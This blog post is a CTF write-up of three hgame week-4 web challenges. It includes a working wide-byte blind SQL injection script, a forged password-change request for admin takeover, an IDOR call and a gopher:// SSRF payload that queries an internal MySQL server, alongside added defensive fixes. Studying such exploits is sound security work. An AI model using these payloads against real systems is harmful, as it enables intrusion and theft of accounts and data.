Sky's blog

hgame-week4-web

Word count: 1,092 / Reading time: 6 min
2018/02/25

SQLi, yet again

Found a leaked backup file: index.php~

<?php
error_reporting(0);
include("sql.php");
// Blacklist WAF: note that "like" and a newline (%0a) are not in the list
$waf="/(union|group by|=|>|<|hex| |lower|strcmp|updatexml|xmlelement|extractvalue|concat|bin|sleep|mid\(|substr|left|ascii|\/\*|\*\/)/i";
if(isset($_GET['user'])){
    if(preg_match_all($waf,$_GET['user'])!=0){
        $user="admin";
    }else{
        // Only the single quote is escaped, by a plain byte-level replace rather than a charset-aware escape
        $user = str_replace("'","\'",$_GET['user']);
    }
    //echo $user."<br>";

    $sqli = new mysqli($host,$username,$passwd,$database);
    // GBK connection charset: a preceding 0xDF byte can swallow the inserted backslash
    $sqli->set_charset("gbk");
    $query="select * from users where username='".$user."'";
    $result = $sqli->query($query);
    //echo $sqli->error;
    $num=0;
    @$num = $result->num_rows;
    if($num>0){
        while($row = $result->fetch_row()){
            echo $row[0]."&nbsp;&nbsp;&nbsp;&nbsp;".$row[1]."&nbsp;&nbsp;&nbsp;".$row[2]."<br>";
        }
    }
}

This one is still fairly easy: like is not in the blacklist, so I went straight to writing a script.
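Why the str_replace escape above stops working once the connection charset is gbk, as an added illustration (not code from the challenge; the function names are hypothetical), together with the charset-aware escape that the PHP side should have used:

```python
# Added example: the naive quote escape from index.php~ versus a charset-aware one.
# These functions are illustrations, not code from the challenge.

def naive_escape(raw: bytes) -> bytes:
    """Byte-level replacement, exactly what str_replace("'", "\\'") does in PHP."""
    return raw.replace(b"'", b"\\'")

def gbk_view(escaped: bytes) -> str:
    """How a MySQL connection with charset gbk interprets the escaped bytes."""
    return escaped.decode("gbk", errors="replace")

def quote_still_escaped(raw: bytes) -> bool:
    """True if the first quote is still preceded by a backslash after GBK decoding.
    For b"admin'" it is; for b"admin\\xdf'" the bytes 0xDF 0x5C form one GBK
    character, so the backslash disappears and the quote closes the SQL string."""
    text = gbk_view(naive_escape(raw))
    idx = text.find("'")
    return idx > 0 and text[idx - 1] == "\\"

def charset_aware_escape(raw: bytes) -> bytes:
    """Decode strictly in the connection charset first, so a stray lead byte such as
    0xDF with no valid trail byte is rejected, then escape per character and re-encode.
    The PHP equivalent is mysqli_real_escape_string() after set_charset(); a prepared
    statement with a bound parameter avoids the problem entirely."""
    text = raw.decode("gbk")  # raises UnicodeDecodeError on malformed input
    return text.replace("\\", "\\\\").replace("'", "\\'").encode("gbk")
```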

# Python 2 script (string.letters and the print statement are Python 2 only)
import requests
import string
url = "http://118.25.18.223:10088/?user="
flag = ""
true_flag = ""
for i in range(1,1000):
    payload = flag
    for j in "0123456789"+string.letters+"!@#$^&*(){}=+`~_":
        #my = "%%df%%27%%0aor%%0a((select%%0adatabase())%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:])
        #my = "%%df%%27%%0aor%%0a((select%%0aTABLE_NAME%%0afrom%%0ainformation_schema.TABLES%%0awhere%%0aTABLE_SCHEMA%%0alike%%0adatabase()limit%%0a0,1)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #flllllag
        #my = "%%df%%27%%0aor%%0a((select%%0aCOLUMN_NAME%%0afrom%%0ainformation_schema.COLUMNS%%0awhere%%0aTABLE_NAME%%0alike%%0a0x666c6c6c6c6c6167%%0alimit%%0a2,1)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #notflag thisisflag
        my = "%%df%%27%%0aor%%0a((select%%0athisisflag%%0afrom%%0aflllllag)%%0alike%%0a0x%s25)%%23"%(payload+hex(ord(j))[2:]) #notflag thisisflag
        url1 = url+my
        r = requests.get(url=url1)
        if '998' in r.content:
            flag += hex(ord(j))[2:]
            true_flag += j
            print true_flag
            break

Which gives the flag:

hgame{like!injection!so!g00d##}

Scattered flag

A JavaScript challenge; most of the issues come from missing validation. There are three steps:
1. Register any account and log in; success gives 1/3 of the flag.
2. Impersonate admin in get_userinfo(); that gives another 1/3.
3. Change admin's password and log in as admin; that gives the last 1/3.
First, note the username and password formats:

username = /^[a-zA-Z0-9]{5,}$/i;
password = /^[a-zA-Z0-9]{6,}$/i;

So a username of at least 5 alphanumeric characters and a password of at least 6 will do; the regex is easy enough to read, so I won't go into it.
Now to the solution.
1. Register an account
Registration requires an SMS verification code, which is also easy; see 1.js:

function get_check(){
    var phone_num = $("#phone").val();
    var st = /^[\d]{11}$/i;
    if(st.test(phone_num)){
        // The server returns the verification code in the response body,
        // and the page writes it straight into the #check field
        $.post('get_phone_num.php',{phone:phone_num},function(data) {
            if(data!="error"){
                $("#check").val(data);
            }
        })
    }
}

Calling get_check() from the browser console is enough to obtain the verification code, and registration succeeds:

User Info

skycool

username: skycool

secret: hgame{0102940de1

2. Change the password
A textbook missing-authentication bug: capture the request and edit it.

POST /change_pwd.php HTTP/1.1
Host: 118.25.18.223:10099
Content-Length: 31
Cache-Control: max-age=0
Origin: http://118.25.18.223:10099
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://118.25.18.223:10099/change_pwd.php
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8cd13b83ef7b312e687c59c83e146907
Connection: close

username=admin&password=skycool

Then log in as admin:

congratulation you get The last flag:
|98924acfce}|  (the text between the vertical bars is the last part of the flag)

3. Call get_userinfo() directly
Looking at http://118.25.18.223:10099/js/2.js:

function get_userinfo(){
    // The username sent to the server is whatever the page text says, so it is attacker-controlled
    var user = $("#user").text();
    $.ajax({
        url: "check_user.php",
        type: "POST",
        data:{username:user},
        dataType: "json",
        error: function(){
            $("#username").html('Error loading XML document');
        },
        success: function(data,status){
            $("#username").html("username: "+data[0]);
            $("#secret").html("secret: "+data[1]);
        }
    });
}

// Note: this invokes get_userinfo() immediately instead of passing it as the ready callback
$(document).ready(get_userinfo());

Calling it directly with user changed to admin returns:

["admin","10c546b2cf68"]

That completes the flag: hgame{0102940de110c546b2cf6898924acfce}
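A minimal server-side model of the three endpoints abused above (get_phone_num.php, change_pwd.php and check_user.php), added here as an illustration and not taken from the challenge; the function names, the USERS store and the session dict are all hypothetical:

```python
# Added example: the vulnerable change_pwd pattern next to fixed versions of all three endpoints.
# Passwords are kept in plaintext only to keep the model short; store salted hashes in practice.
import hmac
import re
import secrets

USERS = {"admin": {"password": "constructed-admin-pass", "secret": "admin-secret"}}

def change_pwd_vulnerable(body: dict) -> bool:
    """change_pwd.php as exploited above: the account to modify comes from the request body."""
    user = USERS.get(body.get("username"))
    if user is None:
        return False
    user["password"] = body["password"]
    return True

def change_pwd_fixed(session: dict, body: dict) -> bool:
    """The account is the one bound to the session, and the caller must know the current password."""
    user = USERS.get(session.get("user"))
    if user is None or not hmac.compare_digest(user["password"], body.get("old_password", "")):
        return False
    user["password"] = body["new_password"]
    return True

def user_info_fixed(session: dict):
    """check_user.php: return the secret of the logged-in user only, never of a client-named user."""
    user = USERS.get(session.get("user"))
    return None if user is None else [session["user"], user["secret"]]

PHONE_RE = re.compile(r"\d{11}")

def send_sms_code_fixed(session: dict, phone: str) -> str:
    """get_phone_num.php: generate the code server-side and keep it in the session;
    the browser only learns that a code was sent."""
    if not PHONE_RE.fullmatch(phone):
        return "error"
    session["sms_phone"] = phone
    session["sms_code"] = f"{secrets.randbelow(10**6):06d}"
    return "sent"  # the real code would be handed to the SMS gateway here

def verify_sms_code(session: dict, phone: str, code: str) -> bool:
    """Registration compares the submitted code against the session copy, in constant time."""
    return session.get("sms_phone") == phone and hmac.compare_digest(session.get("sms_code", ""), code)
```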

Weird SQLi

There is a leaked /.git/ directory.
I registered an account with:

admin%df'
admin

Login succeeded, and the page turned out to be a curl wrapper.
So I tried reading a file:

file:///etc/hosts

Which gave:

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.17.0.2	mysql 77f62039fede
172.17.0.5	b6e0e267e603

So there is a mysql host. Recovering the .git history turned up a deleted config.php, which gives the username week4, the database name users, and no password.
This is the classic gopher-to-MySQL SSRF. Reference link:

https://www.baidu.com/link?url=jC4dzIidPqY9lJSvUyNy2w8oFO63_llwUj1hnkGhNe_r1UVF7ZIyqUV457cSWT6ymMoU3a6i_ST9c2S02F_vkK&wd=&eqid=d2070bde00003288000000035a9502d1

I won't go into the details; this has been a hot topic lately and there are plenty of posts analysing how it works. Here is the payload directly:

gopher://172.17.0.2:3306/A%2C%00%00%01O%B7%00%00%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00week4%00%00flag%00%60%01%00%00%03select%20concat%28cast%280x504b03040a00000000000000000000000000e8030000e803000010000000746869735f69735f7468655f666c6167%20as%20binary%29%2C%20rpad%28%28select%20hgame%20from%20galf%20where%20id%3D1%29%2C%201000%2C%20%27-%27%29%2C%20cast%280x504b01021e030a00000000000000000000000000100000000000000000000000000000000000746869735f69735f7468655f666c6167504b0506000000000100010036000000640000000000%20as%20binary%29%29%00%00%00%00

Which gives the flag:

hgame{Th1s_Flaggggggggggg}
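The allow-list check that the curl wrapper in this challenge was missing, added here as an illustration (not code from the challenge); is_safe_fetch_url, offline_resolver and the constructed name table are hypothetical:

```python
# Added example: reject file://, gopher:// and internal targets before handing a URL to curl.
import socket
from ipaddress import ip_address
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name table so the example runs offline; real code resolves through DNS.
CONSTRUCTED_DNS = {"mysql": "172.17.0.2", "example.com": "93.184.216.34"}

def offline_resolver(host: str) -> str:
    """Return the address for a name, passing IP literals through unchanged."""
    return CONSTRUCTED_DNS.get(host, host)

def is_safe_fetch_url(url: str, resolver=socket.gethostbyname) -> bool:
    """Allow only http(s) to a host that resolves to a globally routable address.

    The scheme check stops file://, gopher://, dict:// and similar; the address check
    stops loopback, link-local, RFC 1918 / Docker ranges and other non-public targets.
    The fetcher must then connect to the address checked here (curl: CURLOPT_RESOLVE)
    and restrict redirects the same way (curl: CURLOPT_REDIR_PROTOCOLS), otherwise the
    check can be sidestepped by DNS rebinding or a redirect to an internal URL.
    """
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 bracket syntax
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host:
        return False
    try:
        addr = ip_address(resolver(host))
    except (socket.gaierror, ValueError):
        return False
    return addr.is_global
```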
